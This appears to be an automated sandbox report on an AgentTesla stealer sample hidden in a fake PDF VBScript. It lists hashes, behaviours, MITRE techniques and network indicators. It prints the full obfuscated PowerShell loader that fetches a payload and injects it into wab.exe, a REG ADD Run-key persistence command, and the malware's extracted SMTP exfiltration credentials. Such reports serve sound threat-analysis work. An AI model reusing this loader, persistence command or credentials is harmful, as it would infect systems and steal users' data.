agenttesla | aa615772cbee140cdb126f54f2fdf72cde32c38ab934d0a46a9bfcea31ca8002

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/04/2024, 11:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FACT AZUR TJ .pdf.vbs
Size

272KB
MD5

c62241a4663adb2e2987b1f9927a3876
SHA1

99524951e2f43b0e5f542acced20c2e7870a91e4
SHA256

aa615772cbee140cdb126f54f2fdf72cde32c38ab934d0a46a9bfcea31ca8002
SHA512

a07aa4633a82a39b1688b2544e5ed36d796c9da470deafbff83fa506234e665c89ddb77f2706c8084e20038ffe99b0b24eb5f2f84b7966b27988eee717c0cedd
SSDEEP

6144:U5h1/GPWvV+kcuUxouBmfgbtosqFH8sBsnQAViKiDDCQbJPQf2/7cgU1bLE3BE+Z:fmFb0mD

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
0nVaQweHLu8RyVL
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2232	WScript.exe
7	2628	powershell.exe
9	2628	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\FTSKIaM = "C:\\Users\\Admin\\AppData\\Roaming\\FTSKIaM\\FTSKIaM.exe"	wab.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fiskekutteren = "%Enkeltmandsvirksomhederne% -w 1 $Skeje=(Get-ItemProperty -Path 'HKCU:\\Ponyernes\\').Approachableness;%Enkeltmandsvirksomhederne% ($Skeje)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	api.ipify.org
16	api.ipify.org
17	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2296	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2580	powershell.exe
2296	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2580 set thread context of 2296	2580	powershell.exe	35

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2288	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2628	powershell.exe
2580	powershell.exe
2580	powershell.exe
2296	wab.exe
2296	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2580	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2296	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2296	wab.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 2628	2232	WScript.exe	29
PID 2232 wrote to memory of 2628	2232	WScript.exe	29
PID 2232 wrote to memory of 2628	2232	WScript.exe	29
PID 2628 wrote to memory of 2428	2628	powershell.exe	31
PID 2628 wrote to memory of 2428	2628	powershell.exe	31
PID 2628 wrote to memory of 2428	2628	powershell.exe	31
PID 2628 wrote to memory of 2580	2628	powershell.exe	33
PID 2628 wrote to memory of 2580	2628	powershell.exe	33
PID 2628 wrote to memory of 2580	2628	powershell.exe	33
PID 2628 wrote to memory of 2580	2628	powershell.exe	33
PID 2580 wrote to memory of 1840	2580	powershell.exe	34
PID 2580 wrote to memory of 1840	2580	powershell.exe	34
PID 2580 wrote to memory of 1840	2580	powershell.exe	34
PID 2580 wrote to memory of 1840	2580	powershell.exe	34
PID 2580 wrote to memory of 2296	2580	powershell.exe	35
PID 2580 wrote to memory of 2296	2580	powershell.exe	35
PID 2580 wrote to memory of 2296	2580	powershell.exe	35
PID 2580 wrote to memory of 2296	2580	powershell.exe	35
PID 2580 wrote to memory of 2296	2580	powershell.exe	35
PID 2580 wrote to memory of 2296	2580	powershell.exe	35
PID 2296 wrote to memory of 1460	2296	wab.exe	36
PID 2296 wrote to memory of 1460	2296	wab.exe	36
PID 2296 wrote to memory of 1460	2296	wab.exe	36
PID 2296 wrote to memory of 1460	2296	wab.exe	36
PID 1460 wrote to memory of 2288	1460	cmd.exe	38
PID 1460 wrote to memory of 2288	1460	cmd.exe	38
PID 1460 wrote to memory of 2288	1460	cmd.exe	38
PID 1460 wrote to memory of 2288	1460	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACT AZUR TJ .pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Etagebyggeriets = 1;$Braising='Substrin';$Braising+='g';Function Confessor($Tressless){$sangvrk=$Tressless.Length-$Etagebyggeriets;For($Fass228=5; $Fass228 -lt $sangvrk; $Fass228+=(6)){$Staldetaters+=$Tressless.$Braising.Invoke($Fass228, $Etagebyggeriets);}$Staldetaters;}function Tubhunter($Arbejdskraftproblemer){& ($Smitstofs) ($Arbejdskraftproblemer);}$samanthas=Confessor 'Un,omMC phaoChevrzH lioiHyperl.linklFrdigaDeche/ Oat 5 Tern.U,der0Omegn Afsky(.cantWFalhoi CartnAfbdndElectoLeuk.wVaabesDerhj almhN Ma,bTEpix, Attri1Ret.e0Adski.U.ush0 Psit; peav SigneWCanceihjemmn Fle.6 Medi4Gt,fl;Unaca MenusxAfson6Omarf4Udski;Sandb Fljt,rHypervCorns: lam1M rke2Maras1Fo.bu.Po ac0 S.al)Stdbr MbelfGLa.iieC.mmicKunstkPalo oTurne/I.dha2Boars0Dikef1 B.ls0N.ndi0monty1 Guld0Ompha1Teaze SialoFSubcairesprrcric.eMi,def plkkoIndlax Sax./Finme1Jub.l2Com,r1Erken.B lli0Lrebo ';$Overrapture=Confessor 'Obse,U WrotsFactie verorGynae-Op akAUnde g AntieLigennPrakttDksma ';$Emperor=Confessor 'MarkahSpan.t.ongatPyrh,pShiplsRidde:mu,rm/ blin/Kirred Ko vrT,insi lowev.enzieTva g.MngdegCou,toT,rrao S dagTabellRea jeTilko.MewlecSprogoTr,ncm Supe/sdmlkuRingecEnsom?s.lfaeSkallx Sv,mp.rchioCaryoru cantDe,ct= va ldSubduoE topwAabennCyklilIrlinoflagsaCocksdFilko&NikotiSchradgrise=Galli1So odVParterradioDUranbV Stop8Konfi5Do trC ndertForfa5 .pun6u derJDikteeAnnb,aHy trIDrejeHExpirLVenteXTekstETast DInd,awExegeLL anef.cenay.emeauEnerg_PleasuFavorBFold,zD sozeMoingfTe,ndg aandgblokt ';$Tuberculose=Confessor 'Rocke>Proto ';$Smitstofs=Confessor 'RevamiBubukeDoktoxAkti ';$Metalfilms = Confessor ',olkeeBi,licUnderh TikroEnnea Zi pu%Nomadadissap.ovjepHoejrdThor.aU,dertDaaseaBuddi%Exalt\SentiP tritlPuppiaDichacInexpame rob Re,nl eskueChandn HalleEnevlsAnt esamili.Ky.liESensarMuthmlForsv Coro& cter& Yan. DiskoeGougecVi,kehM rgroGemme Revo$ Lapp ';Tubhunter (Confessor 'Mello$Li.engR,latl Be.foStencb GaozaFricalPetal:preusMInstiiAst ol.ineaaMat.hn cerfe forhsDiffeihauynsTidskkHilsn= Retl(ArizocMajlimR.mosdBrn.e Bedag/BuledcMineu Music$Ou brM .laye.elvbtOrdreadisaplMediafDonati Glasl krmrmPh,assRntge)Kmni. ');Tubhunter (Confessor 'Harmo$,ornygSpenclM.sploTil.ebRecipaNewfolSkvad:Unde PD lopeKrigsnCo puaServal Her,hR,gniu ippescabreeTarritSelsksDeeja=Landi$BortlE ModemMelanp UnseeNepenrOps,roB rdirRetss.Ins,rsT,nsopMar,ilHomali Q int Tomo(.etfr$Mor iTNummeuCasitbSgeste BookrTannic Re,puBejadlSkotvoCaapesValereOve t)Dugru ');$Emperor=$Penalhusets[0];Tubhunter (Confessor 'Krybs$pktregTe pel Hav.oD gsobMa edape gal,ugho:Be.miSFre,maUndfapraimur Grafo TelegVilifeSagfrnMinib=EthnaNFormueSwe ewSlyn -OsteoOForg,bInde j BisaeAfv gcVan.ttSo.id Indd SVeldty SkovsTegnstBarnee PotwmGrumb. Deb.NSkyggeSundhtIl ud. iodiWTranseAfterb MassCEsotel KompiSam reHetern PasptCul u ');Tubhunter (Confessor 'Hjmes$LaughS Ole.aSkelep UenirCh,lyo Stergwee aeMinednFatuo.SlutlH Tilrevitriaho modFeltueRa.chr slagsMacul[ Mo e$IndkoOPersovsubste Go srKampgrfjernaH,dropDr,vet itsuuOpvkkrBombeeGgese]Arbej=,roso$EndebsKap,la Saltm Lin,aFe ien OpkbtDi frhBa,reaWhortsSt.nn ');$grundforbedring=Confessor 'F ttiSHy.era Modsp i dprR.invoNetmagLogo.ePasodnD skr.By,ewDOffseoXanthwkennen HertlJ.lleoVirilaHove,dRestrFHjemgiAndellForepeBldtv(Sene $UdstaESecktmOverjp overepoetirR.disoGlem rRedel,Splen$SkiffARi pidGennercoursiUnfetaDestanPaullaBoyar)Agt d ';$grundforbedring=$Milanesisk[1]+$grundforbedring;$Adriana=$Milanesisk[0];Tubhunter (Confessor ' Aspc$ Brugg KiselOvrefoTan.eb Untaa Ac,alVarie:Sa coGGi mbe Sco oBughim SignoSe.isrSatinpJournhVac.tiforehsBrunlt D,xt= Tria( CardTMalpiemethosOc,ogtr,ali-devilP Diaga Sl etSac,hh Hjlp Unhol$NutidAAci.udAksemrEndosi lienaPennin Afgra onir)Gravy ');while (!$Geomorphist) {Tubhunter (Confessor ' Mult$D.plogComb.l AprioUnlumb WhalaSjaelldebat:Fl ecE PortxCutifpLik.nuLavprgSandsnAspisaV nembJordrlFou.ie Gard=Condu$SafthtCatamrHe,iou.edemeSidde ') ;Tubhunter $grundforbedring;Tubhunter (Confessor 'StninSTypogt,eslaaNico rLigg t bela-wile.SUdsd lC,ange SynseBadefpSkynd Opena4zin,y ');Tubhunter (Confessor 'overr$SemesgsonoglIdeolo Splib eclaGuldslBagie: rossGFiraaeUngkvoSerismB,hanoHegemrLandspregnbhSek.ti FunksHoa.dtCardi=P ste(TendoTRumple s mpsBemantphyto-StaalPHel ua,ninttAku,uhrepla Fruit$Ove eAO stidBygger GiveiCon,uaNethenTrdesaIncon) ravo ') ;Tubhunter (Confessor ' .ndg$MalthgBar el AirboFj rnbEliciaBarndlTusse:AftgtPLitigrD viso SaltgSy.rarBittea DisamPeriofAnmrkeMisa,jCheetlFlleseKoordnIndleebl dmsFo,bi=S opl$PresugForb,lWood.oRaa.sbthalaaPami.l Dich:,ludcZPizzae TymplFors oNeutrt SkvaeD,onirCampsnTrollePe se+Fiss +,vsha%Tra,s$ nkeP WhigeAperun,ranuaSnakklUnwanh.orpauFcsdrsMelodedom.atMennesa.apt.affrdcHal,boElkebuParafnCompat B rr ') ;$Emperor=$Penalhusets[$Programfejlenes];}Tubhunter (Confessor ' Kal,$Ombryg ForelBugdoosc.ncb AreoaKumi lTroml: .etehRemu eLektilaktintBurg.aJokumlPiratsSupervD smaa Or.hrI,coniSamaraPassibSlutregdsknlTearl Readv=Oppet Tar nG NoncePachytPr,ma-Unsu.CSpragoStea nLsrept YockeMenhanMc,intDisab prin$ Pa,tADrilldDityrr InlyiEditeaDriftnFyresa .gte ');Tubhunter (Confessor 'Meteo$ GrougVandylTyskeo GralbSpindaKornslyve e:SnabbF,ygtiu MisrgOestrtSelvmdBarylaRi sgnEunicnOm,tyeSaar.l epusFucose FillrSknlisEleut Stila=Tibic troch[TornaSPa.keyZsdias G.mmtU.pareTourimBrspa.AfcheCNil soBispenstr,gvUns,neUpsear .anktMonke]Nskel:T.lst:V.ltiFp otorEvertoFirefm simpBCoatiaFlunksLinguePer,s6Kinki4Hjer SH.ntlto.eorrG.bstiRefern onbgMachi(suk e$foto.hAstigeNar ilVeldst Plana Tilhl Borss F.rdvsortjaKvadrr RoosiFn.slagjaldbHypere r,nslParap)Scoot ');Tubhunter (Confessor ' Jord$KrapygDepillAzeotoC,phab outraDat ll.thei:UdnvnHbu,lovMillkiVan.fdLachstuv jrlUnsp.lUdk,neKa.itrSamlinWarmoeBlrersSkdes Strou=Ekser Toupe[GuideS Spo.yEttiesBru stKarafe ranmRoute.M ljbTIntuie EranxFacontHelep. ,igeEUsan,nCurvecS.andoTrophd Posii NeurnUd,odg Paas]Tarpu:U,tra: Xa.tASwoonS.idudC TempIFirspILevit.An isGKrekoe,inqutCursiSLabsat Ra.drFo,triKallinEmissgP,efo(Conde$BesicFprdikuUfor gImprgtAndondCloudaSnow nErucinUds,ieTil yl Prios sikkeUrtetrStemnsUdrke) R dr ');Tubhunter (Confessor ' Undi$nonfegDecenlAfvalo AbhobL ndvaK.pselNegot:ExistECestim.verliTmrergPor.irleg.ma FinktBesk.iMogenvdiscie djae= P od$GyritHN,usevDecoriLaritdPumpkt MammlAlabalsandae KrlhrPalaunRednie Obscs Gla .Spi,esHjt.duHeptob.uinosMblprtInkarrc,illiTrylln pri,gUred.(Multi3Indle2Citro5 stra9Fallo6Skotj0Lobfi,.iffl2To db8Forun6Vaabe6Demat8Ad.ur) Arti ');Tubhunter $Emigrative;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Placableness.Erl && echo $"
    3⤵
    PID:2428
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Etagebyggeriets = 1;$Braising='Substrin';$Braising+='g';Function Confessor($Tressless){$sangvrk=$Tressless.Length-$Etagebyggeriets;For($Fass228=5; $Fass228 -lt $sangvrk; $Fass228+=(6)){$Staldetaters+=$Tressless.$Braising.Invoke($Fass228, $Etagebyggeriets);}$Staldetaters;}function Tubhunter($Arbejdskraftproblemer){& ($Smitstofs) ($Arbejdskraftproblemer);}$samanthas=Confessor 'Un,omMC phaoChevrzH lioiHyperl.linklFrdigaDeche/ Oat 5 Tern.U,der0Omegn Afsky(.cantWFalhoi CartnAfbdndElectoLeuk.wVaabesDerhj almhN Ma,bTEpix, Attri1Ret.e0Adski.U.ush0 Psit; peav SigneWCanceihjemmn Fle.6 Medi4Gt,fl;Unaca MenusxAfson6Omarf4Udski;Sandb Fljt,rHypervCorns: lam1M rke2Maras1Fo.bu.Po ac0 S.al)Stdbr MbelfGLa.iieC.mmicKunstkPalo oTurne/I.dha2Boars0Dikef1 B.ls0N.ndi0monty1 Guld0Ompha1Teaze SialoFSubcairesprrcric.eMi,def plkkoIndlax Sax./Finme1Jub.l2Com,r1Erken.B lli0Lrebo ';$Overrapture=Confessor 'Obse,U WrotsFactie verorGynae-Op akAUnde g AntieLigennPrakttDksma ';$Emperor=Confessor 'MarkahSpan.t.ongatPyrh,pShiplsRidde:mu,rm/ blin/Kirred Ko vrT,insi lowev.enzieTva g.MngdegCou,toT,rrao S dagTabellRea jeTilko.MewlecSprogoTr,ncm Supe/sdmlkuRingecEnsom?s.lfaeSkallx Sv,mp.rchioCaryoru cantDe,ct= va ldSubduoE topwAabennCyklilIrlinoflagsaCocksdFilko&NikotiSchradgrise=Galli1So odVParterradioDUranbV Stop8Konfi5Do trC ndertForfa5 .pun6u derJDikteeAnnb,aHy trIDrejeHExpirLVenteXTekstETast DInd,awExegeLL anef.cenay.emeauEnerg_PleasuFavorBFold,zD sozeMoingfTe,ndg aandgblokt ';$Tuberculose=Confessor 'Rocke>Proto ';$Smitstofs=Confessor 'RevamiBubukeDoktoxAkti ';$Metalfilms = Confessor ',olkeeBi,licUnderh TikroEnnea Zi pu%Nomadadissap.ovjepHoejrdThor.aU,dertDaaseaBuddi%Exalt\SentiP tritlPuppiaDichacInexpame rob Re,nl eskueChandn HalleEnevlsAnt esamili.Ky.liESensarMuthmlForsv Coro& cter& Yan. DiskoeGougecVi,kehM rgroGemme Revo$ Lapp ';Tubhunter (Confessor 'Mello$Li.engR,latl Be.foStencb GaozaFricalPetal:preusMInstiiAst ol.ineaaMat.hn cerfe forhsDiffeihauynsTidskkHilsn= Retl(ArizocMajlimR.mosdBrn.e Bedag/BuledcMineu Music$Ou brM .laye.elvbtOrdreadisaplMediafDonati Glasl krmrmPh,assRntge)Kmni. ');Tubhunter (Confessor 'Harmo$,ornygSpenclM.sploTil.ebRecipaNewfolSkvad:Unde PD lopeKrigsnCo puaServal Her,hR,gniu ippescabreeTarritSelsksDeeja=Landi$BortlE ModemMelanp UnseeNepenrOps,roB rdirRetss.Ins,rsT,nsopMar,ilHomali Q int Tomo(.etfr$Mor iTNummeuCasitbSgeste BookrTannic Re,puBejadlSkotvoCaapesValereOve t)Dugru ');$Emperor=$Penalhusets[0];Tubhunter (Confessor 'Krybs$pktregTe pel Hav.oD gsobMa edape gal,ugho:Be.miSFre,maUndfapraimur Grafo TelegVilifeSagfrnMinib=EthnaNFormueSwe ewSlyn -OsteoOForg,bInde j BisaeAfv gcVan.ttSo.id Indd SVeldty SkovsTegnstBarnee PotwmGrumb. Deb.NSkyggeSundhtIl ud. iodiWTranseAfterb MassCEsotel KompiSam reHetern PasptCul u ');Tubhunter (Confessor 'Hjmes$LaughS Ole.aSkelep UenirCh,lyo Stergwee aeMinednFatuo.SlutlH Tilrevitriaho modFeltueRa.chr slagsMacul[ Mo e$IndkoOPersovsubste Go srKampgrfjernaH,dropDr,vet itsuuOpvkkrBombeeGgese]Arbej=,roso$EndebsKap,la Saltm Lin,aFe ien OpkbtDi frhBa,reaWhortsSt.nn ');$grundforbedring=Confessor 'F ttiSHy.era Modsp i dprR.invoNetmagLogo.ePasodnD skr.By,ewDOffseoXanthwkennen HertlJ.lleoVirilaHove,dRestrFHjemgiAndellForepeBldtv(Sene $UdstaESecktmOverjp overepoetirR.disoGlem rRedel,Splen$SkiffARi pidGennercoursiUnfetaDestanPaullaBoyar)Agt d ';$grundforbedring=$Milanesisk[1]+$grundforbedring;$Adriana=$Milanesisk[0];Tubhunter (Confessor ' Aspc$ Brugg KiselOvrefoTan.eb Untaa Ac,alVarie:Sa coGGi mbe Sco oBughim SignoSe.isrSatinpJournhVac.tiforehsBrunlt D,xt= Tria( CardTMalpiemethosOc,ogtr,ali-devilP Diaga Sl etSac,hh Hjlp Unhol$NutidAAci.udAksemrEndosi lienaPennin Afgra onir)Gravy ');while (!$Geomorphist) {Tubhunter (Confessor ' Mult$D.plogComb.l AprioUnlumb WhalaSjaelldebat:Fl ecE PortxCutifpLik.nuLavprgSandsnAspisaV nembJordrlFou.ie Gard=Condu$SafthtCatamrHe,iou.edemeSidde ') ;Tubhunter $grundforbedring;Tubhunter (Confessor 'StninSTypogt,eslaaNico rLigg t bela-wile.SUdsd lC,ange SynseBadefpSkynd Opena4zin,y ');Tubhunter (Confessor 'overr$SemesgsonoglIdeolo Splib eclaGuldslBagie: rossGFiraaeUngkvoSerismB,hanoHegemrLandspregnbhSek.ti FunksHoa.dtCardi=P ste(TendoTRumple s mpsBemantphyto-StaalPHel ua,ninttAku,uhrepla Fruit$Ove eAO stidBygger GiveiCon,uaNethenTrdesaIncon) ravo ') ;Tubhunter (Confessor ' .ndg$MalthgBar el AirboFj rnbEliciaBarndlTusse:AftgtPLitigrD viso SaltgSy.rarBittea DisamPeriofAnmrkeMisa,jCheetlFlleseKoordnIndleebl dmsFo,bi=S opl$PresugForb,lWood.oRaa.sbthalaaPami.l Dich:,ludcZPizzae TymplFors oNeutrt SkvaeD,onirCampsnTrollePe se+Fiss +,vsha%Tra,s$ nkeP WhigeAperun,ranuaSnakklUnwanh.orpauFcsdrsMelodedom.atMennesa.apt.affrdcHal,boElkebuParafnCompat B rr ') ;$Emperor=$Penalhusets[$Programfejlenes];}Tubhunter (Confessor ' Kal,$Ombryg ForelBugdoosc.ncb AreoaKumi lTroml: .etehRemu eLektilaktintBurg.aJokumlPiratsSupervD smaa Or.hrI,coniSamaraPassibSlutregdsknlTearl Readv=Oppet Tar nG NoncePachytPr,ma-Unsu.CSpragoStea nLsrept YockeMenhanMc,intDisab prin$ Pa,tADrilldDityrr InlyiEditeaDriftnFyresa .gte ');Tubhunter (Confessor 'Meteo$ GrougVandylTyskeo GralbSpindaKornslyve e:SnabbF,ygtiu MisrgOestrtSelvmdBarylaRi sgnEunicnOm,tyeSaar.l epusFucose FillrSknlisEleut Stila=Tibic troch[TornaSPa.keyZsdias G.mmtU.pareTourimBrspa.AfcheCNil soBispenstr,gvUns,neUpsear .anktMonke]Nskel:T.lst:V.ltiFp otorEvertoFirefm simpBCoatiaFlunksLinguePer,s6Kinki4Hjer SH.ntlto.eorrG.bstiRefern onbgMachi(suk e$foto.hAstigeNar ilVeldst Plana Tilhl Borss F.rdvsortjaKvadrr RoosiFn.slagjaldbHypere r,nslParap)Scoot ');Tubhunter (Confessor ' Jord$KrapygDepillAzeotoC,phab outraDat ll.thei:UdnvnHbu,lovMillkiVan.fdLachstuv jrlUnsp.lUdk,neKa.itrSamlinWarmoeBlrersSkdes Strou=Ekser Toupe[GuideS Spo.yEttiesBru stKarafe ranmRoute.M ljbTIntuie EranxFacontHelep. ,igeEUsan,nCurvecS.andoTrophd Posii NeurnUd,odg Paas]Tarpu:U,tra: Xa.tASwoonS.idudC TempIFirspILevit.An isGKrekoe,inqutCursiSLabsat Ra.drFo,triKallinEmissgP,efo(Conde$BesicFprdikuUfor gImprgtAndondCloudaSnow nErucinUds,ieTil yl Prios sikkeUrtetrStemnsUdrke) R dr ');Tubhunter (Confessor ' Undi$nonfegDecenlAfvalo AbhobL ndvaK.pselNegot:ExistECestim.verliTmrergPor.irleg.ma FinktBesk.iMogenvdiscie djae= P od$GyritHN,usevDecoriLaritdPumpkt MammlAlabalsandae KrlhrPalaunRednie Obscs Gla .Spi,esHjt.duHeptob.uinosMblprtInkarrc,illiTrylln pri,gUred.(Multi3Indle2Citro5 stra9Fallo6Skotj0Lobfi,.iffl2To db8Forun6Vaabe6Demat8Ad.ur) Arti ');Tubhunter $Emigrative;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Placableness.Erl && echo $"
      4⤵
      PID:1840
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fiskekutteren" /t REG_EXPAND_SZ /d "%Enkeltmandsvirksomhederne% -w 1 $Skeje=(Get-ItemProperty -Path 'HKCU:\Ponyernes\').Approachableness;%Enkeltmandsvirksomhederne% ($Skeje)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1460
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fiskekutteren" /t REG_EXPAND_SZ /d "%Enkeltmandsvirksomhederne% -w 1 $Skeje=(Get-ItemProperty -Path 'HKCU:\Ponyernes\').Approachableness;%Enkeltmandsvirksomhederne% ($Skeje)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f58ed3c48834d0230f28c7dd8c50619f

SHA1
d89a4e60c33c1bbdda1125f4b2d127090f080f45

SHA256
7d519c12a72763f5e2d83464bb545b3ffc46ecda778a97e4ad22dc41fcc3f077

SHA512
a5eb805d8cdf7b1af2b0445f75eda48659bc7a606bffef286535212810f48631ef8d4c79d61270551f42801d5cdc0dfc2165b0d35140f9ebe4bdccf79c2b3905

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8ZF8RX2ZHUY1W0HLK9PR.temp

Filesize
7KB

MD5
c664080ac930fd3580b097fba8c9fe5d

SHA1
fb37b1a879ae266d8921b67cf839d42b34588992

SHA256
d591faa6ddb48d7be4225637467f93829d11db80e349eb63f012671c477e3ef8

SHA512
52073a665fcc0fe96ecf2b9b3da91686c26719eb09df728f42b314b74d2db0f22583dca38ca357f4d3a96163e411e011e9bebb4386766090831441915ffe2547

Download Submit
C:\Users\Admin\AppData\Roaming\Placableness.Erl

Filesize
461KB

MD5
5381d1318cc6058b6c665026219bd1e2

SHA1
c109526f088d42f06fc5adf8b32950fa6d48632b

SHA256
f073018e7a01f8e738082422d4bef4a2a4adfa08057008e5bd58ab7223ef900e

SHA512
7848209883ad6577f9522efdab3d32cc5bd983377f452e24576592b766afc3590b975b28fb816cfdb9333f430fb6adcac16981ece48fa11aa1066f66912ac783

Download Submit
memory/2296-84-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/2296-79-0x00000000254E0000-0x0000000025520000-memory.dmp

Filesize
256KB

Download
memory/2296-77-0x000000006F050000-0x000000006F73E000-memory.dmp

Filesize
6.9MB

Download
memory/2296-49-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/2296-76-0x0000000000A50000-0x0000000000A92000-memory.dmp

Filesize
264KB

Download
memory/2296-75-0x0000000000A50000-0x0000000001AB2000-memory.dmp

Filesize
16.4MB

Download
memory/2296-86-0x000000006F050000-0x000000006F73E000-memory.dmp

Filesize
6.9MB

Download
memory/2296-87-0x00000000254E0000-0x0000000025520000-memory.dmp

Filesize
256KB

Download
memory/2296-51-0x0000000077780000-0x0000000077856000-memory.dmp

Filesize
856KB

Download
memory/2296-50-0x00000000777B6000-0x00000000777B7000-memory.dmp

Filesize
4KB

Download
memory/2580-33-0x00000000735D0000-0x0000000073B7B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-31-0x00000000735D0000-0x0000000073B7B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-39-0x0000000002880000-0x00000000028C0000-memory.dmp

Filesize
256KB

Download
memory/2580-32-0x0000000002880000-0x00000000028C0000-memory.dmp

Filesize
256KB

Download
memory/2580-42-0x00000000055A0000-0x00000000055A1000-memory.dmp

Filesize
4KB

Download
memory/2580-43-0x0000000006610000-0x000000000B7E4000-memory.dmp

Filesize
81.8MB

Download
memory/2580-44-0x00000000735D0000-0x0000000073B7B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-45-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/2580-46-0x0000000002880000-0x00000000028C0000-memory.dmp

Filesize
256KB

Download
memory/2580-47-0x0000000077780000-0x0000000077856000-memory.dmp

Filesize
856KB

Download
memory/2580-36-0x0000000002880000-0x00000000028C0000-memory.dmp

Filesize
256KB

Download
memory/2580-35-0x0000000002880000-0x00000000028C0000-memory.dmp

Filesize
256KB

Download
memory/2628-34-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

Filesize
9.6MB

Download
memory/2628-38-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2628-21-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

Filesize
9.6MB

Download
